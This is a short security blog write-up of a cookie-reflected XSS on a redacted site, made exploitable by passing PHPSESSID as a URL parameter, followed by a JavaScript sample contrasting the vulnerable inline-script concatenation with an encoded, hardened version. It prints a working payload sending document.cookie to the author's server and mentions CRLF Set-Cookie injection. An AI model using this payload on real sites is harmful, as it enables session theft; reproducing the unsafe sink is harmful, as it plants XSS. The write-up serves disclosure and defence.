Utkarsh Agrawal
Oct 22, 2018 · 2 min read

Cookie-based injection XSS: making it exploitable without exploiting other vulns.

Hi all,

This is a short blog post about making cookie-based XSS exploitable.

I was testing a site [redacted.com] (can’t take the name for obvious reasons). I was testing it in the Repeater tab of Burp, on a parameter which was reflected back on the HTML page but encoded.

URL:- http://[redacted.com]/path/file.php?f=a*&location=12

* was the injection point I was trying.

<script type="text/javascript">
page.perform('a*', 12);
</script>

I was trying to bypass the filter by injecting different payloads again and again (i.e. sending requests again and again), and all of a sudden I got another parameter reflected on the page: a cookie parameter which was not reflected before. How?

Frankly, I don’t know.

<script type="text/javascript">
page.perform('a*', 12, '&PHPSESSID=73uj42unj5vu6urg6v4aa8');
</script>

I was literally surprised at how I got this new parameter reflected on the page and why not before. Okay, go on; now I started to see if that cookie parameter could be injected or not, and to my surprise it was injectable.

Now I had an XSS injection point, but the main thing is: how can I exploit it against users?

For making a cookie-based XSS injection exploitable you might need to exploit another vulnerability, i.e. CRLF injection (because you can then try %0d%0aSet-Cookie). I tried to find one but didn’t get it.

Next I got an idea: what if I place that cookie parameter into the URL GET parameters like this:-

http://[redacted.com]/path/file.php?f=a&location=12&PHPSESSID={payload}

payload:-

a');document.location="http://myserver/"%2bdocument.cookie;test('.

And yeah, it works the same. Wow! I got all the cookies on my server. I quickly reported it to the team. :)

It was a good case for me.

AND one thing I got to learn is that if you get a cookie-based injection, then you should also check by moving the parameter from the Cookie header to a URL parameter, like when you switch POST to GET to make it easily exploitable.
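As an added example (not code from the original post or the tested site), here is the same inline-script sink built two ways in JavaScript: renderUnsafe() reproduces the pattern from the write-up, where the session id is concatenated straight into a single-quoted JS literal, and renderSafe() emits it as an encoded JS string literal so the value can never close the quote. The helper names and the page.perform() call are assumptions; the payload is constructed to mirror the post's.

```javascript
// Constructed sample value, mirroring the post's payload (%2b decoded to +).
const PAYLOAD = `a');document.location="http://myserver/"+document.cookie;test('.`;

// Vulnerable pattern from the write-up: the request-controlled value is
// pasted into a single-quoted JS literal, so a quote in it ends the literal.
function renderUnsafe(f, location, sid) {
  return `<script type="text/javascript">\n` +
    `page.perform('${f}', ${Number(location)}, '&PHPSESSID=${sid}');\n` +
    `</script>`;
}

// Encode a value as a JS string literal that is safe inside a <script> block:
// JSON.stringify escapes quotes and backslashes, then the characters the HTML
// parser (< > &) and JS line terminators (U+2028/9) care about are hex-escaped.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened render: every interpolated value goes through jsStringLiteral().
function renderSafe(f, location, sid) {
  return `<script type="text/javascript">\n` +
    `page.perform(${jsStringLiteral(f)}, ${Number(location)}, ` +
    `${jsStringLiteral('&PHPSESSID=' + sid)});\n` +
    `</script>`;
}

// The second lesson of the post: read the session id only from the Cookie
// header, never from the query string, so a crafted link cannot supply it.
function sessionIdFromCookieHeader(cookieHeader) {
  const m = /(?:^|;\s*)PHPSESSID=([^;]*)/.exec(cookieHeader || '');
  return m ? m[1] : null;
}

module.exports = { PAYLOAD, renderUnsafe, renderSafe, jsStringLiteral, sessionIdFromCookieHeader };
```

Run it under Node and compare the two outputs: the unsafe one contains a second statement after `page.perform(...)`, the safe one keeps the whole payload inside one quoted literal.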

Thanks
